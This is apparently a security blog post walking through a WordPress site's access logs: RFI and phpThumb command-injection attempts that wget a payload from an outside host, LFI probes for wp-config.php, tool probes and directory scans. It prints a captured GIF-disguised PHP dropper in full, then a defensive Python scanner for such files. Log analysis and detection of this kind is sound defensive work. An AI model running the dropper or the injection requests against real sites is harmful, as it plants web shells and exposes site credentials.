One of the mandatory tasks in security work is reading the server logs. This matters because it lets you respond as quickly as possible and narrow down where any malware is. Below are some examples, with what each log means, taken from this very website of mine.
Example 1: from the log I discovered that I was being scanned for RFI, along with the malware aimed at me, if any
162.158.161.152 - - [21/Jan/2020:07:27:11 +0000] "GET /wp-content/themes/Newspaper/tim.php?src=http://blogger.com.finalthemes.com/kontol.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.69.132.212 - - [21/Jan/2020:07:27:12 +0000] "GET /wp-content/themes/Newspaper/timthumb.php?src=http://blogger.com.finalthemes.com/kontol.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.17 - - [21/Jan/2020:07:27:12 +0000] "GET /wp-content/themes/Newspaper/thumb.php?src=http://blogger.com.finalthemes.com/kontol.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.68.145.235 - - [21/Jan/2020:07:27:12 +0000] "GET /wp-content/themes/Newspaper/functions/timthumb.php?src=http://blogger.com.finalthemes.com/kontol.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.62 - - [21/Jan/2020:07:27:12 +0000] "GET /wp-content/themes/Newspaper/functions/thumb.php?src=http://blogger.com.finalthemes.com/kontol.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.163.111 - - [21/Jan/2020:07:27:13 +0000] "GET /wp-content/themes/Newspaper//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.152 - - [21/Jan/2020:07:27:14 +0000] "GET /wp-content/themes/Newspaper/thumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.69.132.110 - - [21/Jan/2020:07:27:15 +0000] "GET /wp-content/themes/Newspaper/phpthumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.69.132.254 - - [21/Jan/2020:07:27:15 +0000] "GET /wp-content/themes/Newspaper/phpThumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.162.93 - - [21/Jan/2020:07:27:15 +0000] "GET /wp-content/themes/Newspaper//util/phpthumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.152 - - [21/Jan/2020:07:27:16 +0000] "GET /wp-content/themes/Newspaper/images/phpThumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.110 - - [21/Jan/2020:07:27:16 +0000] "GET /wp-content/themes/Newspaper/core/lib/imgthumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.69.132.182 - - [21/Jan/2020:07:27:17 +0000] "GET /wp-content/themes/Newspaper/images/phpThumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.68.145.241 - - [21/Jan/2020:07:27:17 +0000] "GET /wp-content/themes/Newspaper//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.162.93 - - [21/Jan/2020:07:27:17 +0000] "GET /wp-content/themes/Newspaper/thumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.17 - - [21/Jan/2020:07:27:18 +0000] "GET /wp-content/themes/Newspaper/phpthumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.68.145.235 - - [21/Jan/2020:07:27:18 +0000] "GET /wp-content/themes/Newspaper/phpThumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.131 - - [21/Jan/2020:07:27:18 +0000] "GET /wp-content/themes/Newspaper//util/phpthumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.62 - - [21/Jan/2020:07:27:18 +0000] "GET /wp-content/themes/Newspaper/images/phpThumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.68.145.235 - - [21/Jan/2020:07:27:19 +0000] "GET /wp-content/themes/Newspaper/core/lib/imgthumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.114 - - [21/Jan/2020:07:27:19 +0000] "GET /wp-content/themes/Newspaper/images/phpThumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
The malware I obtained from the log
GIF89a;
<?php
error_reporting(0);
function parah($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
echo '<center><br><b>h0d3_g4nT3nG'.'<br>'.'Uname:'.php_uname().'<br></b></center>';
$asu =rand();
$filename="dont-dell$asu.php";
$fget=file_get_contents("https://pastebin.com/raw/UkW9ywcC");
// WGET Backdoor
$path=getcwd().DIRECTORY_SEPARATOR;
$fileopen=fopen("$path/$filename",'w');
$execfile=fwrite($fileopen,$fget);
if($execfile)
{
echo "Success UP: $path$filename <br>";
}
else {
echo "Failed execute newfile $filename in $path <br>";
}
if(isset($_POST['Submit'])){
$filedir = "";
$maxfile = '2000000';
$mode = '0644';
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if(isset($_FILES['image']['name'])) {
$qx = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $qx);
@chmod ($qx, octdec($mode));
echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
}
}
else{
echo'<center><form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form></center>';
}
$web = $_SERVER['HTTP_HOST']."";
$upload = $_SERVER['DOCUMENT_ROOT']. "/jembu$asu.php";
$config = parah("https://pastebin.com/raw/UkW9ywcC");
$open = fopen($upload, 'w');
fwrite($open, $config);
fclose($open);
if(file_exists($upload)){
echo "Shell Ke Upload : http://$web/jembu$asu.php<br>" ;
}else {
echo "Gagal Upload Shell -_- <br>";
}
$tujuanmail = 'barbarnime@gmail.com,tukangcekstil@hotmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p $path$filename \n Uname : ".php_uname()." \n Acess : http://$web/jembu$asu.php \n *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ] \n";
@mail($tujuanmail, "Timthumb Bot !!", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>
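The sample above is worth reading for what it leaves behind rather than for what it does: a file that starts with a GIF header but carries PHP (so an image-type check passes), a second copy of the remote payload written under a generated name (`dont-dell<n>.php`, `jembu<n>.php`), an unauthenticated upload form, and `error_reporting(0)` so nothing shows up in the PHP error log. Those are exactly the things a defender can sweep a web root for. The scanner below is an added example written for this post, not code from the post or from any project it mentions; the function names (`inspect_bytes`, `scan_webroot`, `demo`), the indicator list and the fixture files are my own choices, and the fixture is a trimmed, constructed copy of the markers above with a placeholder URL, used only as test input.

```python
"""Sweep a web root for files that look like the GIF89a/PHP polyglot dropper above."""
import os
import re
import shutil
import tempfile

# Indicators drawn from the sample: an image magic header followed by PHP code,
# a remote fetch written straight to disk, an upload handler with no authentication,
# suppressed error reporting, and the two file-name schemes the dropper uses.
IMAGE_MAGIC = (b"GIF89a", b"GIF87a", b"\x89PNG", b"\xff\xd8\xff")
PHP_OPEN = re.compile(rb"<\?php|<\?=")
REMOTE_FETCH = re.compile(rb"(?:file_get_contents|curl_init)\s*\(\s*['\"]https?://")
DROP_NAME_RE = re.compile(r"^(?:dont-dell|jembu)\d+\.php$")


def inspect_bytes(data):
    """Return the list of indicators present in one file's content."""
    findings = []
    if data.startswith(IMAGE_MAGIC) and PHP_OPEN.search(data):
        findings.append("image magic header followed by a PHP open tag")
    if REMOTE_FETCH.search(data) and b"fwrite(" in data:
        findings.append("fetches remote content and writes it to disk")
    if b"$_FILES" in data and b"move_uploaded_file" in data:
        findings.append("upload handler with no authentication check")
    if b"error_reporting(0)" in data:
        findings.append("silences all PHP errors")
    return findings


def scan_webroot(root, head_bytes=256 * 1024):
    """Map each suspicious path under root to its indicators (file names included)."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read(head_bytes)  # the header and the first few hundred KB are enough
            findings = inspect_bytes(data)
            if DROP_NAME_RE.match(name):
                findings.append("file name matches the dropper's naming scheme")
            if findings:
                hits[path] = findings
    return hits


# Constructed fixture: a trimmed copy of the markers in the sample above, with a
# placeholder URL. It is detection test input, not a working script.
SAMPLE_POLYGLOT = b"""GIF89a;
<?php
error_reporting(0);
$fget=file_get_contents("http://payload.example.invalid/x.txt");
$fileopen=fopen(getcwd()."/dont-dell".rand().".php",'w');
fwrite($fileopen,$fget);
if(isset($_FILES['image'])){ @move_uploaded_file($_FILES['image']['tmp_name'], $_FILES['image']['name']); }
?>
"""


def demo():
    """Build a throw-away web root (one clean script, one real GIF, one polyglot) and scan it."""
    root = tempfile.mkdtemp(prefix="webroot-")
    try:
        os.makedirs(os.path.join(root, "wp-content", "uploads"))
        fixtures = {
            "index.php": b"<?php\necho 'hello';\n",
            "wp-content/uploads/logo.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00;",
            "wp-content/uploads/dont-dell1690345.php": SAMPLE_POLYGLOT,
        }
        for rel, data in fixtures.items():
            with open(os.path.join(root, *rel.split("/")), "wb") as fh:
                fh.write(data)
        return {os.path.relpath(p, root).replace(os.sep, "/"): f
                for p, f in scan_webroot(root).items()}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path)
        for finding in findings:
            print("  -", finding)
```

Run it against a real document root with `scan_webroot("/var/www/html")` and treat every hit as something to inspect by hand; a legitimate plugin can trip one indicator, but an image header followed by a PHP open tag has no honest explanation.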
Example 2: from the log I know I am being attacked with LFI
162.158.161.110 - - [14/Jan/2020:04:12:43 +0000] "GET /wp-content/plugins/livesig/livesig-ajax-backend.php?wp-root=../../../wp-config.php&action=asdf HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
162.158.161.66 - - [15/Jan/2020:18:40:10 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 400 11 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
162.158.161.38 - - [16/Jan/2020:01:17:14 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 400 11 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.68.145.6 - - [16/Jan/2020:08:27:48 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 732 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
162.158.161.65 - - [17/Jan/2020:15:20:48 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 400 11 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.68.145.235 - - [17/Jan/2020:15:21:38 +0000] "GET /wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.83 - - [17/Jan/2020:15:21:57 +0000] "GET /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.48 - - [17/Jan/2020:15:21:58 +0000] "GET /wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.69.132.242 - - [18/Jan/2020:18:24:12 +0000] "GET /wp-content/plugins/photocart-link/decode.php?id=../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
172.69.132.110 - - [18/Jan/2020:18:24:13 +0000] "GET /wp-content/plugins/photocart-link/decode.php?id=../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
162.158.164.221 - - [20/Jan/2020:10:48:05 +0000] "GET /wp-content/plugins/post-recommendations-for-wordpress/lib/api.php?abspath=../../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
172.69.132.254 - - [20/Jan/2020:10:48:10 +0000] "GET /wp-content/plugins/post-recommendations-for-wordpress/lib/api.php?abspath=../../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
172.69.132.242 - - [21/Jan/2020:07:25:42 +0000] "GET /wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
162.158.161.65 - - [21/Jan/2020:07:25:44 +0000] "GET /wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Example 3: my server is being probed by some tool written in Python or Perl
162.158.161.37 - - [14/Jan/2020:06:29:25 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
162.158.161.66 - - [14/Jan/2020:06:29:27 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.68.145.6 - - [14/Jan/2020:06:29:41 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.68.145.6 - - [14/Jan/2020:06:29:44 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.69.132.230 - - [14/Jan/2020:06:29:53 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
162.158.161.66 - - [14/Jan/2020:06:30:00 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
162.158.161.37 - - [14/Jan/2020:06:30:08 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.68.145.6 - - [14/Jan/2020:06:30:11 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
162.158.161.37 - - [14/Jan/2020:06:30:18 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.68.145.6 - - [14/Jan/2020:06:30:24 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.69.132.230 - - [14/Jan/2020:06:30:30 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.69.132.230 - - [14/Jan/2020:06:30:39 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
162.158.161.66 - - [14/Jan/2020:06:30:45 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.68.145.6 - - [14/Jan/2020:06:30:47 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.68.145.6 - - [14/Jan/2020:06:30:51 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
162.158.161.66 - - [14/Jan/2020:06:30:53 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.69.132.230 - - [14/Jan/2020:06:30:56 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
162.158.161.37 - - [14/Jan/2020:06:31:00 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
162.158.161.37 - - [14/Jan/2020:06:31:02 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
172.69.132.230 - - [14/Jan/2020:06:31:05 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
I could tell this is a tool simply because I have worked with them so much, and the libraries these tools use usually send a HEAD request first to test the connection to the website.
Example 4: my server is being scanned for directories in search of sensitive information
172.69.132.212 - - [20/Jan/2020:21:13:35 +0000] "GET /?author=4 HTTP/1.1" 404 25824 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.158.161.38 - - [20/Jan/2020:23:00:39 +0000] "GET /wp-po.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
172.69.132.242 - - [20/Jan/2020:23:32:38 +0000] "GET /wp/ HTTP/1.1" 404 25814 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
162.158.161.14 - - [20/Jan/2020:23:32:52 +0000] "GET /blog/ HTTP/1.1" 404 25823 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
162.158.161.14 - - [20/Jan/2020:23:33:18 +0000] "GET /old/ HTTP/1.1" 404 25814 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.68.145.6 - - [20/Jan/2020:23:33:29 +0000] "GET /test/ HTTP/1.1" 404 25814 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.69.132.242 - - [20/Jan/2020:23:33:37 +0000] "GET /main/ HTTP/1.1" 404 25812 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.69.132.242 - - [20/Jan/2020:23:33:56 +0000] "GET /site/ HTTP/1.1" 404 25812 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
162.158.161.14 - - [20/Jan/2020:23:34:08 +0000] "GET /backup/ HTTP/1.1" 404 25812 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
162.158.161.65 - - [20/Jan/2020:23:34:20 +0000] "GET /demo/ HTTP/1.1" 404 25812 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.69.132.242 - - [20/Jan/2020:23:34:33 +0000] "GET /home/ HTTP/1.1" 404 25817 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.69.132.242 - - [20/Jan/2020:23:34:45 +0000] "GET /tmp/ HTTP/1.1" 404 25814 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.68.145.6 - - [20/Jan/2020:23:34:56 +0000] "GET /cms/ HTTP/1.1" 404 25821 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.68.145.6 - - [20/Jan/2020:23:35:07 +0000] "GET /dev/ HTTP/1.1" 404 25814 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.68.145.6 - - [20/Jan/2020:23:35:18 +0000] "GET /portal/ HTTP/1.1" 404 25817 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.68.145.6 - - [20/Jan/2020:23:35:29 +0000] "GET /web/ HTTP/1.1" 404 25815 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
162.158.161.14 - - [20/Jan/2020:23:35:41 +0000] "GET /temp/ HTTP/1.1" 404 25817 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
172.68.145.6 - - [21/Jan/2020:00:03:43 +0000] "GET /?author=4 HTTP/1.1" 404 25837 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.158.163.105 - - [21/Jan/2020:00:10:30 +0000] "GET /?author=4 HTTP/1.1" 404 25827 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.158.161.65 - - [18/Jan/2020:17:25:54 +0000] "GET /wp-content/plugins/formcraft/file-upload/server/php/ HTTP/1.1" 404 25878 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.69.132.254 - - [18/Jan/2020:17:26:07 +0000] "GET /wp-content/plugins/formcraft/file-upload/server/php/files/199877.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.65 - - [18/Jan/2020:17:44:55 +0000] "GET /chuyenmuc/reviews/?filter_by=review_high HTTP/1.1" 404 25823 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
162.158.161.14 - - [18/Jan/2020:18:18:11 +0000] "GET /kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.163.84 - - [18/Jan/2020:18:18:11 +0000] "GET /admin/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.83 - - [18/Jan/2020:18:18:11 +0000] "GET /plugins/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.69.132.122 - - [18/Jan/2020:18:18:11 +0000] "GET /assets/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
172.69.132.38 - - [18/Jan/2020:18:18:11 +0000] "GET /admin/editor/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
162.158.161.83 - - [18/Jan/2020:18:18:11 +0000] "GET /ckeditor/plugins/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
